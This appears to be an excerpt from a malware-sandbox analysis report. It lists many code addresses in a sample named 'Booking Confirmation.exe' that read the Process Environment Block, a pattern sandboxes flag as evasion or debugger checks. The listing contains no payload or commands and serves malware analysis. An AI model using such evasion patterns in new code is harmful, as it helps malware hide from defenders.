Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01934015 mov eax, dword ptr fs:[00000030h]	5_2_01934015
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01934015 mov eax, dword ptr fs:[00000030h]	5_2_01934015
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]	5_2_018E7016
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]	5_2_018E7016
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7016 mov eax, dword ptr fs:[00000030h]	5_2_018E7016
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]	5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]	5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]	5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]	5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189002D mov eax, dword ptr fs:[00000030h]	5_2_0189002D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]	5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]	5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]	5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187B02A mov eax, dword ptr fs:[00000030h]	5_2_0187B02A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01880050 mov eax, dword ptr fs:[00000030h]	5_2_01880050
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01880050 mov eax, dword ptr fs:[00000030h]	5_2_01880050
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01922073 mov eax, dword ptr fs:[00000030h]	5_2_01922073
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01931074 mov eax, dword ptr fs:[00000030h]	5_2_01931074
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01871B8F mov eax, dword ptr fs:[00000030h]	5_2_01871B8F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01871B8F mov eax, dword ptr fs:[00000030h]	5_2_01871B8F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191D380 mov ecx, dword ptr fs:[00000030h]	5_2_0191D380
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192138A mov eax, dword ptr fs:[00000030h]	5_2_0192138A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189B390 mov eax, dword ptr fs:[00000030h]	5_2_0189B390
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892397 mov eax, dword ptr fs:[00000030h]	5_2_01892397
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]	5_2_01894BAD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]	5_2_01894BAD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894BAD mov eax, dword ptr fs:[00000030h]	5_2_01894BAD
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01935BA5 mov eax, dword ptr fs:[00000030h]	5_2_01935BA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E53CA mov eax, dword ptr fs:[00000030h]	5_2_018E53CA
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E53CA mov eax, dword ptr fs:[00000030h]	5_2_018E53CA
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188DBE9 mov eax, dword ptr fs:[00000030h]	5_2_0188DBE9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]	5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]	5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]	5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]	5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]	5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018903E2 mov eax, dword ptr fs:[00000030h]	5_2_018903E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192131B mov eax, dword ptr fs:[00000030h]	5_2_0192131B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186DB40 mov eax, dword ptr fs:[00000030h]	5_2_0186DB40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938B58 mov eax, dword ptr fs:[00000030h]	5_2_01938B58
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186F358 mov eax, dword ptr fs:[00000030h]	5_2_0186F358
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186DB60 mov ecx, dword ptr fs:[00000030h]	5_2_0186DB60
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01893B7A mov eax, dword ptr fs:[00000030h]	5_2_01893B7A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01893B7A mov eax, dword ptr fs:[00000030h]	5_2_01893B7A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189D294 mov eax, dword ptr fs:[00000030h]	5_2_0189D294
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189D294 mov eax, dword ptr fs:[00000030h]	5_2_0189D294
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]	5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]	5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]	5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]	5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018652A5 mov eax, dword ptr fs:[00000030h]	5_2_018652A5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187AAB0 mov eax, dword ptr fs:[00000030h]	5_2_0187AAB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187AAB0 mov eax, dword ptr fs:[00000030h]	5_2_0187AAB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189FAB0 mov eax, dword ptr fs:[00000030h]	5_2_0189FAB0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892ACB mov eax, dword ptr fs:[00000030h]	5_2_01892ACB
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892AE4 mov eax, dword ptr fs:[00000030h]	5_2_01892AE4
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AA16 mov eax, dword ptr fs:[00000030h]	5_2_0192AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AA16 mov eax, dword ptr fs:[00000030h]	5_2_0192AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01878A0A mov eax, dword ptr fs:[00000030h]	5_2_01878A0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186AA16 mov eax, dword ptr fs:[00000030h]	5_2_0186AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186AA16 mov eax, dword ptr fs:[00000030h]	5_2_0186AA16
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01883A1C mov eax, dword ptr fs:[00000030h]	5_2_01883A1C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]	5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov ecx, dword ptr fs:[00000030h]	5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]	5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01865210 mov eax, dword ptr fs:[00000030h]	5_2_01865210
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A4A2C mov eax, dword ptr fs:[00000030h]	5_2_018A4A2C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A4A2C mov eax, dword ptr fs:[00000030h]	5_2_018A4A2C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]	5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]	5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]	5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01869240 mov eax, dword ptr fs:[00000030h]	5_2_01869240
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192EA55 mov eax, dword ptr fs:[00000030h]	5_2_0192EA55
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018F4257 mov eax, dword ptr fs:[00000030h]	5_2_018F4257
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A927A mov eax, dword ptr fs:[00000030h]	5_2_018A927A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191B260 mov eax, dword ptr fs:[00000030h]	5_2_0191B260
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191B260 mov eax, dword ptr fs:[00000030h]	5_2_0191B260
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938A62 mov eax, dword ptr fs:[00000030h]	5_2_01938A62
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]	5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]	5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]	5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01892581 mov eax, dword ptr fs:[00000030h]	5_2_01892581
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]	5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]	5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]	5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]	5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01862D8A mov eax, dword ptr fs:[00000030h]	5_2_01862D8A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189FD9B mov eax, dword ptr fs:[00000030h]	5_2_0189FD9B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189FD9B mov eax, dword ptr fs:[00000030h]	5_2_0189FD9B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018935A1 mov eax, dword ptr fs:[00000030h]	5_2_018935A1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]	5_2_01891DB5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]	5_2_01891DB5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01891DB5 mov eax, dword ptr fs:[00000030h]	5_2_01891DB5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019305AC mov eax, dword ptr fs:[00000030h]	5_2_019305AC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019305AC mov eax, dword ptr fs:[00000030h]	5_2_019305AC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]	5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]	5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]	5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov ecx, dword ptr fs:[00000030h]	5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]	5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6DC9 mov eax, dword ptr fs:[00000030h]	5_2_018E6DC9
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01918DF1 mov eax, dword ptr fs:[00000030h]	5_2_01918DF1
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187D5E0 mov eax, dword ptr fs:[00000030h]	5_2_0187D5E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187D5E0 mov eax, dword ptr fs:[00000030h]	5_2_0187D5E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0192FDE2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938D34 mov eax, dword ptr fs:[00000030h]	5_2_01938D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192E539 mov eax, dword ptr fs:[00000030h]	5_2_0192E539
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]	5_2_01894D3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]	5_2_01894D3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01894D3B mov eax, dword ptr fs:[00000030h]	5_2_01894D3B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01873D34 mov eax, dword ptr fs:[00000030h]	5_2_01873D34
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186AD30 mov eax, dword ptr fs:[00000030h]	5_2_0186AD30
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018EA537 mov eax, dword ptr fs:[00000030h]	5_2_018EA537
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A3D43 mov eax, dword ptr fs:[00000030h]	5_2_018A3D43
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E3540 mov eax, dword ptr fs:[00000030h]	5_2_018E3540
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01887D50 mov eax, dword ptr fs:[00000030h]	5_2_01887D50
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188C577 mov eax, dword ptr fs:[00000030h]	5_2_0188C577
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188C577 mov eax, dword ptr fs:[00000030h]	5_2_0188C577
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187849B mov eax, dword ptr fs:[00000030h]	5_2_0187849B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938CD6 mov eax, dword ptr fs:[00000030h]	5_2_01938CD6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_019214FB mov eax, dword ptr fs:[00000030h]	5_2_019214FB
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]	5_2_018E6CF0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]	5_2_018E6CF0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6CF0 mov eax, dword ptr fs:[00000030h]	5_2_018E6CF0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]	5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]	5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]	5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E6C0A mov eax, dword ptr fs:[00000030h]	5_2_018E6C0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921C06 mov eax, dword ptr fs:[00000030h]	5_2_01921C06
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]	5_2_0193740D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]	5_2_0193740D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193740D mov eax, dword ptr fs:[00000030h]	5_2_0193740D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189BC2C mov eax, dword ptr fs:[00000030h]	5_2_0189BC2C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A44B mov eax, dword ptr fs:[00000030h]	5_2_0189A44B
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FC450 mov eax, dword ptr fs:[00000030h]	5_2_018FC450
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FC450 mov eax, dword ptr fs:[00000030h]	5_2_018FC450
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188746D mov eax, dword ptr fs:[00000030h]	5_2_0188746D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01878794 mov eax, dword ptr fs:[00000030h]	5_2_01878794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]	5_2_018E7794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]	5_2_018E7794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]	5_2_018E7794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A37F5 mov eax, dword ptr fs:[00000030h]	5_2_018A37F5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A70E mov eax, dword ptr fs:[00000030h]	5_2_0189A70E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A70E mov eax, dword ptr fs:[00000030h]	5_2_0189A70E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193070D mov eax, dword ptr fs:[00000030h]	5_2_0193070D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193070D mov eax, dword ptr fs:[00000030h]	5_2_0193070D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188F716 mov eax, dword ptr fs:[00000030h]	5_2_0188F716
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FFF10 mov eax, dword ptr fs:[00000030h]	5_2_018FFF10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FFF10 mov eax, dword ptr fs:[00000030h]	5_2_018FFF10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01864F2E mov eax, dword ptr fs:[00000030h]	5_2_01864F2E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01864F2E mov eax, dword ptr fs:[00000030h]	5_2_01864F2E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189E730 mov eax, dword ptr fs:[00000030h]	5_2_0189E730
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187EF40 mov eax, dword ptr fs:[00000030h]	5_2_0187EF40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187FF60 mov eax, dword ptr fs:[00000030h]	5_2_0187FF60
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938F6A mov eax, dword ptr fs:[00000030h]	5_2_01938F6A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FFE87 mov eax, dword ptr fs:[00000030h]	5_2_018FFE87
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E46A7 mov eax, dword ptr fs:[00000030h]	5_2_018E46A7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]	5_2_01930EA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]	5_2_01930EA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]	5_2_01930EA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938ED6 mov eax, dword ptr fs:[00000030h]	5_2_01938ED6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018936CC mov eax, dword ptr fs:[00000030h]	5_2_018936CC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A8EC7 mov eax, dword ptr fs:[00000030h]	5_2_018A8EC7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0191FEC0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018776E2 mov eax, dword ptr fs:[00000030h]	5_2_018776E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018916E0 mov ecx, dword ptr fs:[00000030h]	5_2_018916E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]	5_2_0186C600
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]	5_2_0186C600
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]	5_2_0186C600
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01898E00 mov eax, dword ptr fs:[00000030h]	5_2_01898E00
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A61C mov eax, dword ptr fs:[00000030h]	5_2_0189A61C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A61C mov eax, dword ptr fs:[00000030h]	5_2_0189A61C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921608 mov eax, dword ptr fs:[00000030h]	5_2_01921608
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186E620 mov eax, dword ptr fs:[00000030h]	5_2_0186E620
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191FE3F mov eax, dword ptr fs:[00000030h]	5_2_0191FE3F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]	5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]	5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]	5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]	5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]	5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]	5_2_01877E41
